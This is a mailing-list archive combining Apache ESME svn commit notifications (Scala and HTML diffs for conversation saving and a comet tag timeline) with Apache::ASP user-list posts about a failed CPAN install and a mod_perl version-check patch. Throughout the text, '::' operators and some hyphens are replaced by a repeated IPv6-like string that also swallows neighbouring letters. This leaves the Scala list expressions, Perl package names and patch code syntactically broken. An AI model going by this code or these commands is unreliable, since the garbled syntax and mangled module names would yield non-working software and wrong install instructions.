<esme-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 73940 invoked by uid 99); 19 Oct 2010 06:44:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 19 Oct 2010 06:44:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 19 Oct 2010 06:44:37 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 680A8238890A; Tue, 19 Oct 2010 06:43:41 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1024133 - /incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala Date: Tue, 19 Oct 2010 06:43:41 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: vdichev Date: Tue Oct 19 06:43:41 2010 New Revision: 1024133 URL: http://svn.apache.org/viewvc?rev=1024133&view=rev Log: ESME-291 Fix duplicate message in conversations Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala?rev=1024133&r1=1024132&r2=1024133&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala Tue Oct 19 06:43:41 2010 @@ -49,7 +49,7 @@ object Message extends Message with Long if (!replyTo.conversation.defined_?) { replyTo.conversation(replyTo.id).save } - msg.conversation(replyTo.conversation).save + msg.conversation(replyTo.conversation) } } } From [email protected] Tue Oct 19 11:25:19 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99895 invoked from network); 19 Oct 2010 11:25:19 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 19 Oct 2010 11:25:19 -0000 Received: (qmail 80814 invoked by uid 500); 19 Oct 2010 11:25:19 -0000 Delivered-To: [email protected] Received: (qmail 80784 invoked by uid 500); 19 Oct 2010 11:25:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <esme-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 80776 invoked by uid 99); 19 Oct 2010 11:25:17 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 19 Oct 2010 11:25:17 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 19 Oct 2010 11:25:17 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 2BD1C2388906; Tue, 19 Oct 2010 11:24:21 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1024203 - /incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala Date: Tue, 19 Oct 2010 11:24:21 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: vdichev Date: Tue Oct 19 11:24:20 2010 New Revision: 1024203 URL: http://svn.apache.org/viewvc?rev=1024203&view=rev Log: Fix conversation not being saved Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala?rev=1024203&r1=1024202&r2=1024203&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala Tue Oct 19 11:24:20 2010 @@ -124,8 +124,9 @@ object Message extends Message with Long msg.saveTheTags() } - override def afterCreate = fixConversation _ acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b - saveTags _ acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b super.afterCreate + override def afterCreate = saveTags _ acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b super.afterCreate + + override def beforeCreate = fixConversation _ acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b super.beforeCreate override def afterSave = uncache _ acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b super.afterSave From [email protected] Sun Oct 24 16:29:47 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 57604 invoked from network); 24 Oct 2010 16:29:46 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 24 Oct 2010 16:29:46 -0000 Received: (qmail 73906 invoked by uid 500); 24 Oct 2010 16:29:46 -0000 Delivered-To: [email protected] Received: (qmail 73863 invoked by uid 500); 24 Oct 2010 16:29:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <esme-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 73855 invoked by uid 99); 24 Oct 2010 16:29:46 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 24 Oct 2010 16:29:46 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 24 Oct 2010 16:29:43 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 8516C2388980; Sun, 24 Oct 2010 16:28:45 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1026833 - in /incubator/esme/trunk/server/src/main: scala/org/apache/esme/actor/ scala/org/apache/esme/comet/ scala/org/apache/esme/snippet/ webapp/info_view/ webapp/templates-hidden/ Date: Sun, 24 Oct 2010 16:28:45 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: esjewett Date: Sun Oct 24 16:28:45 2010 New Revision: 1026833 URL: http://svn.apache.org/viewvc?rev=1026833&view=rev Log: [ESME-287] [ESME-289] Switch tag view timeline to the standard format and use comet, so new messages with a tag automagically show up on the page. Added: incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/TagTimeline.scala incubator/esme/trunk/server/src/main/webapp/templates-hidden/timeline_tag.html Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/TagDistributor.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/UserActor.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/TagDisplay.scala incubator/esme/trunk/server/src/main/webapp/info_view/tag.html Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala?rev=1026833&r1=1026832&r2=1026833&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala Sun Oct 24 16:28:45 2010 @@ -68,13 +68,14 @@ object Distributor extends LiftActor { case ListenObject(listenable, who) => listenable match { case u:User => findOrCreateUser(u.id) ! UserActor.Listen(who) - case c:Message => ConvDistributor ! ConvDistributor.Listen(c,who) - case x => + case c:Message => ConvDistributor ! ConvDistributor.Listen(c,who) + case t:Tag => TagDistributor ! TagDistributor.Listen(t,who) } case UnlistenObject(listenable, who) => listenable match { case u:User => findOrCreateUser(u.id) ! UserActor.Unlisten(who) case c:Message => ConvDistributor ! ConvDistributor.Unlisten(c,who) + case t:Tag => TagDistributor ! TagDistributor.Unlisten(t,who) } case LatestMessages(user, cnt) => Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/TagDistributor.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/TagDistributor.scala?rev=1026833&r1=1026832&r2=1026833&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/TagDistributor.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/TagDistributor.scala Sun Oct 24 16:28:45 2010 @@ -23,7 +23,9 @@ import net.liftweb._ import actor._ import org.apache.esme._ -import model.{Tag, User, TagFollowReason} +import model.{Tag, User, Message, TagFollowReason, NoReason, MailboxReason} + +import scala.collection.mutable.HashMap object TagDistributor extends LiftActor { @@ -34,13 +36,28 @@ object TagDistributor extends LiftActor t.followers.refresh.map( u => { Distributor ! Distributor.AddMessageToMailbox(u.id, msg, TagFollowReason(t.name)); }) + listeners.getOrElse(t, List()).map( + _ ! MessageReceived(msg, NoReason) + ) }) }) } + + case Listen(tag, who) => + listeners.update(tag, who acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b listeners.getOrElse(tag, List())) + + case Unlisten(tag, who) => + listeners.update(tag, listeners.getOrElse(tag, List()).filter( _ ne who)) } def touch { - } + } + + private var listeners: HashMap[Tag,List[LiftActor]] = new HashMap + + case class Listen(tag:Tag,who:LiftActor) + case class Unlisten(tag:Tag,who:LiftActor) + case class MessageReceived(msg: Message, reason: MailboxReason) } \ No newline at end of file Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/UserActor.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/UserActor.scala?rev=1026833&r1=1026832&r2=1026833&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/UserActor.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/UserActor.scala Sun Oct 24 16:28:45 2010 @@ -154,7 +154,7 @@ class UserActor extends LiftActor { Distributor ! Distributor.NewMessage(msg) - reply(msg) + reply(msg) } case AddToMailbox(msg, reason) => Added: incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/TagTimeline.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/TagTimeline.scala?rev=1026833&view=auto ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/TagTimeline.scala (added) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/TagTimeline.scala Sun Oct 24 16:28:45 2010 @@ -0,0 +1,61 @@ +/** + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + +package org.apache.esme.comet + +import net.liftweb.common._ +import net.liftweb.mapper._ +import net.liftweb.http._ +import net.liftweb.util.Helpers.TimeSpan + +import org.apache.esme._ +import actor.{Distributor,UserActor,TagDistributor} +import model._ + +class TagTimeline extends Timeline { + + val jsId = "tag_timeline_messages" + val tagName = (S.param("tag") openOr "").trim + val tag = Tag.findAll(By(Tag.name, tagName)) + + override def localSetup() { + super.localSetup() + + for(t <- tag) { + Distributor ! Distributor.ListenObject(t, this) + messages = t.findMessages().map(m => (m.id.is, NoReason, false)).take(40) + } + } + + override def localShutdown() { + super.localShutdown() + for(t <- tag) { + Distributor ! Distributor.UnlistenObject(t, this) + } + } + + override def lifespan = Full(TimeSpan(300000)) + + override def lowPriority = { + case TagDistributor.MessageReceived(msg, r) => + messages = ((msg.id.is,r,false) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b messages).take(40) + reRender(false) + } + +} \ No newline at end of file Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/TagDisplay.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/TagDisplay.scala?rev=1026833&r1=1026832&r2=1026833&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/TagDisplay.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/TagDisplay.scala Sun Oct 24 16:28:45 2010 @@ -45,19 +45,16 @@ object TagDisplay { val name = (S.param("tag") openOr "N/A").trim - val tag = Tag.findAll(By(Tag.name, name)) + val tag = Tag.findAll(By(Tag.name, name)).headOption val user = User.currentUser - val messageList: List[Message] = - for { - t <- tag - item <- t.findMessages() - } yield item + val messageList: List[Message] = + {for(t <- tag) yield { t.findMessages() }}.getOrElse(List()) def followOrUnfollow: NodeSeq = { val ret: Box[NodeSeq] = for { u <- user - t = tag.first + t <- tag } yield { if (!t.followers.contains(u)) { ajaxButton("Follow tag", () => { @@ -78,9 +75,14 @@ object TagDisplay { } def updateFollow: JsCmd = SetHtml("following", followOrUnfollow) + + def cometTimeline:NodeSeq = { for(t <- tag) yield { + <lift:comet type="TagTimeline" name={"tag"+t.id.is} /> + }}.getOrElse(Text("")) bind("tag", in, "name" -> name, - "each" -> MessageUtils.bindMessages(messageList) _, + "each" -> MessageUtils.bindMessages(messageList) _, + "cometTimeline" -> cometTimeline, "followButton" -> followOrUnfollow ) } Modified: incubator/esme/trunk/server/src/main/webapp/info_view/tag.html URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/webapp/info_view/tag.html?rev=1026833&r1=1026832&r2=1026833&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/webapp/info_view/tag.html (original) +++ incubator/esme/trunk/server/src/main/webapp/info_view/tag.html Sun Oct 24 16:28:45 2010 @@ -16,46 +16,15 @@ specific language governing permissions and limitations * under the License. * --> -<lift:surround with="base" at="left"> - <script type="text/javascript" src="../scripts/esme_table_sorter_tag.js"></script> - <lift:TableSorterSnip/> - <lift:tag_display> -<div id="back-header"> - <h1><lift:loc>ui_tag_title</lift:loc><i> '<tag:name/>'</i></h1> -<div class="container-settings"> - <span id="following"><tag:followButton/></span> - - <table id="esme-table" class="tablesorter"> - <thead> - <tr> - <th> - <lift:loc>ui_tag_author</lift:loc> - </th> - <th> - <lift:loc>ui_tag_message</lift:loc> - </th> - <th> - <lift:loc>ui_tag_date</lift:loc> - </th> - </tr> - </thead> - <tbody> - <tag:each> - <tr> - <td> - <item:author/> - </td> - <td> - <item:body/> - </td> - <td align="center"> - <item:date/> - </td> - </tr> - </tag:each> - </tbody> - </table> - </div> - </div><!-- End demo --> - </lift:tag_display> +<lift:surround with="base" at="left"> + <link rel="stylesheet" type="text/css" href="../style/style.css" /> + <lift:tag_display> + <div id="back-header"> + <h1><lift:loc>ui_tag_title</lift:loc> '<tag:name/>'</h1> + </div> + <div class="container-aux"> + <span id="following"><tag:followButton/></span> + <lift:embed what="templates-hidden/timeline_tag"/> + </div> + </lift:tag_display> </lift:surround> \ No newline at end of file Added: incubator/esme/trunk/server/src/main/webapp/templates-hidden/timeline_tag.html URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/webapp/templates-hidden/timeline_tag.html?rev=1026833&view=auto ============================================================================== --- incubator/esme/trunk/server/src/main/webapp/templates-hidden/timeline_tag.html (added) +++ incubator/esme/trunk/server/src/main/webapp/templates-hidden/timeline_tag.html Sun Oct 24 16:28:45 2010 @@ -0,0 +1,29 @@ +<!-- + Licensed to the Apache Software Foundation (ASF) under one * + or more contributor license agreements. See the NOTICE file * + distributed with this work for additional information * + regarding copyright ownership. The ASF licenses this file * + to you under the Apache License, Version 2.0 (the * + "License"); you may not use this file except in compliance * + with the License. You may obtain a copy of the License at * + * + http://www.apache.org/licenses/LICENSE-2.0 * + * + Unless required by applicable law or agreed to in writing, * + software distributed under the License is distributed on an * + "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * + KIND, either express or implied. See the License for the * + specific language governing permissions and limitations * + under the License. * +--> + +<div id="tag_timeline_messages"> + <head> + <script src="../scripts/display_messages_top.js" type="text/javascript"/> + <script src="../scripts/pretty.js" type="text/javascript"/> + </head> + <lift:tag_display> + <tag:cometTimeline /> + </lift:tag_display> + <lift:embed what="templates-hidden/message_core"/> +</div> From [email protected] Sat Oct 30 11:08:12 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76848 invoked from network); 30 Oct 2010 11:08:11 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 30 Oct 2010 11:08:11 -0000 Received: (qmail 10669 invoked by uid 500); 30 Oct 2010 11:08:11 -0000 Delivered-To: [email protected] Received: (qmail 10638 invoked by uid 500); 30 Oct 2010 11:08:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <esme-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10630 invoked by uid 99); 30 Oct 2010 11:08:09 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 30 Oct 2010 11:08:09 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 30 Oct 2010 11:08:07 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 957EB238890D; Sat, 30 Oct 2010 11:07:10 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1029020 - /incubator/esme/branches/tagandconversationfollow/ Date: Sat, 30 Oct 2010 11:07:10 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: esjewett Date: Sat Oct 30 11:07:10 2010 New Revision: 1029020 URL: http://svn.apache.org/viewvc?rev=1029020&view=rev Log: Remove tagandconversationfollow branch as it has been merged into trunk Removed: incubator/esme/branches/tagandconversationfollow/
From [email protected] Tue Oct 04 07:37:20 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60839 invoked from network); 4 Oct 2005 07:37:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Oct 2005 07:37:20 -0000 Received: (qmail 46451 invoked by uid 500); 4 Oct 2005 07:37:18 -0000 Delivered-To: [email protected] Received: (qmail 46434 invoked by uid 500); 4 Oct 2005 07:37:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 46423 invoked by uid 99); 4 Oct 2005 07:37:18 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 04 Oct 2005 00:37:18 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO www.3dpn.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 04 Oct 2005 00:37:21 -0700 Received: from [161.129.204.104] (helo=stephen) by www.3dpn.com with asmtp (Exim 4.24) id 1EMhLz-0002H2-Kh for [email protected]; Tue, 04 Oct 2005 03:36:47 -0400 From: "Stephen Hyde" <[email protected]> To: <[email protected]> Subject: Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bxtra problems Date: Tue, 4 Oct 2005 08:36:45 +0100 Message-ID: <!~!UENERkVCMDkAAQACAAAAAAAAAAAAAAAAABgAAAAAAAAAh5b7GzyDFEmuLVHEnnMJecKAAAAQAAAAOoaZdcrystalferguson@example.org> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Microsoft Office Outlook, Build 11.0.5510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2527 thread-index: AcXItl83N5sl9BvLTGmgC3QebNADjg== X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi, im trying to install apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8basp:extra on my server but I get the following error whenever I try to run the cpan install, any ideas how I can sort it out? The systems running centos 4 cpan> install Bundlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bxtra Starting to warm up server........... Server failed to start Running make test Can't test without successful make Running make install Make had returned bas status. Install seems impossible --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Oct 15 05:42:17 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52240 invoked from network); 15 Oct 2005 05:42:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Oct 2005 05:42:15 -0000 Received: (qmail 37679 invoked by uid 500); 15 Oct 2005 05:42:13 -0000 Delivered-To: [email protected] Received: (qmail 36671 invoked by uid 500); 15 Oct 2005 05:42:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 16740 invoked by uid 99); 11 Oct 2005 15:02:36 -0000 X-ASF-Spam-Status: No, hits=2.8 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_POST,DNS_FROM_RFC_WHOIS X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=lima; d=yahoogroups.com; b=DgqTXfCN+zHPubEti+lM8UBPY0fkZgGS9T+jPNXQUXdBioTNYmXeTTtU/Iou6exAOilgz2V0Uo8YcgvpUnBYTMV9RavSySkHndU1qZK2I1IRMGQqzPO9lveSXDpX/V9F; Date: Tue, 11 Oct 2005 15:02:07 -0000 From: "bfbay2005" <[email protected]> To: [email protected] Subject: Re: [patch]fix for modperl-2.0.0-0.rc5 Message-ID: <[email protected]> In-Reply-To: <[email protected]> User-Agent: eGroups-EW/0.82 MIME-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: quoted-printable X-Mailer: Yahoo Groups Message Poster X-Yahoo-Post-IP: 161.129.204.104 X-Yahoo-Newman-Property: groups-compose Sender: [email protected] X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --- In [email protected], joel reed <joel.reed@d...> wrote: > > i needed to make the following change to get Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP 2.59 to > work with fedora core 4's mod_perl-2.0.0-0.rc5.3. > > without it i see: > > [Wed Jun 22 09:10:21 2005] [error] [client 161.129.204.104] Can't locate object > method "get" via package "APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable" at /usr/lib/perl5/site_perl/5.8.6/Apache > /ASP.pm line 2022.\n at /usr/lib/perl5/site_perl/5.8.6/Apache/ASP.pm line 20 > 22\n\tApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bget_dir_config('APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable=3DHASH(0x80422a94)', 'Global') > called at /usr/lib/perl5/site_perl/5.8.6/Apache/ASP.pm line > 277\n\tApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bnew('Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP', 'Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequestRec=3DSCALAR(0x8014fec4)', > '/usr/local/share/lm-4.0/web/status.asp') called at > /usr/lib/perl5/site_perl/5.8.6/Apache/ASP.pm line 183\n\tApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhandler('Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequestRec=3DSCALAR(0x8014fec4)') called at -e line 0\n\teval {...} called at -e line 0\n > > because $mod_perl2 is not set as it should be. > > HTH, > > jr > > here's what worked for me: > > --- /usr/lib/perl5/site_perl/5.8.6/Apache/ASP.pm.orig 2005-06-22 10:10:37.000000000 -0400 > +++ /usr/lib/perl5/site_perl/5.8.6/Apache/ASP.pm 2005-06-22 10:13:13.000000000 -0400 > @@ -63,7 +63,11 @@ unless($LoadModPerl++) { > } > > if($ENV{MOD_PERL}) { > - $ModPerl2 =3D ($mod_perlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bVERSION >=3D 1.99); > + # release 1.999_22 of mod_perl seems to require > + # using $ENV{MOD_PERL_API_VERSION} not $mod_perlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bVERSION > + my $ver =3D $mod_perlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bVERSION; > + if ($ver eq "") { $ver =3D $ENV{MOD_PERL_API_VERSION}; } > + $ModPerl2 =3D ($ver >=3D 1.99); > if($ModPerl2) { > eval "use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpacheCommon ();"; > die($@) if $@; > > --------------------------------------------------------------------- > To unsubscribe, e-mail: asp-unsubscribe@p... > For additional commands, e-mail: asp-help@p... > I am kind of confused by this solution... you placed the following code in ASP.pm?? unless($LoadModPerl++) { } if($ENV{MOD_PERL}) { $ModPerl2 =3D ($mod_perlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bVERSION >=3D 1.99); # release 1.999_22 of mod_perl seems to require # using $ENV{MOD_PERL_API_VERSION} not $mod_perlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bVERSION my $ver =3D $mod_perlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bVERSION; if ($ver eq "") { $ver =3D $ENV{MOD_PERL_API_VERSION}; } $ModPerl2 =3D ($ver >=3D 1.99); if($ModPerl2) { eval "use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpacheCommon ();"; die($@) if $@; I am having the same error message as you had....Can't locate object method "get" via package "APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable" at blah, blah, blah. thanks, Brian --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Oct 15 05:42:17 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52229 invoked from network); 15 Oct 2005 05:42:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Oct 2005 05:42:15 -0000 Received: (qmail 37674 invoked by uid 500); 15 Oct 2005 05:42:13 -0000 Delivered-To: [email protected] Received: (qmail 36627 invoked by uid 500); 15 Oct 2005 05:42:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 88368 invoked by uid 99); 12 Oct 2005 00:46:34 -0000 X-ASF-Spam-Status: No, hits=2.8 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_POST,DNS_FROM_RFC_WHOIS X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=lima; d=yahoogroups.com; b=i2mo7oO/3lTrZZWUAvWi7oancuQX2t7vQ7kdTSrCciPEsPUnkFs/Igi2oynweK3qKfWnBk29T8DykEWeOVRz+P8sC6jiAqd2Hrh49TIZczg4sz0XcV9OU/bVSdknyHUj; Date: Wed, 12 Oct 2005 00:46:12 -0000 From: "bfbay2005" <[email protected]> To: [email protected] Subject: Re: [patch]fix for modperl-2.0.0-0.rc5 Message-ID: <[email protected]> 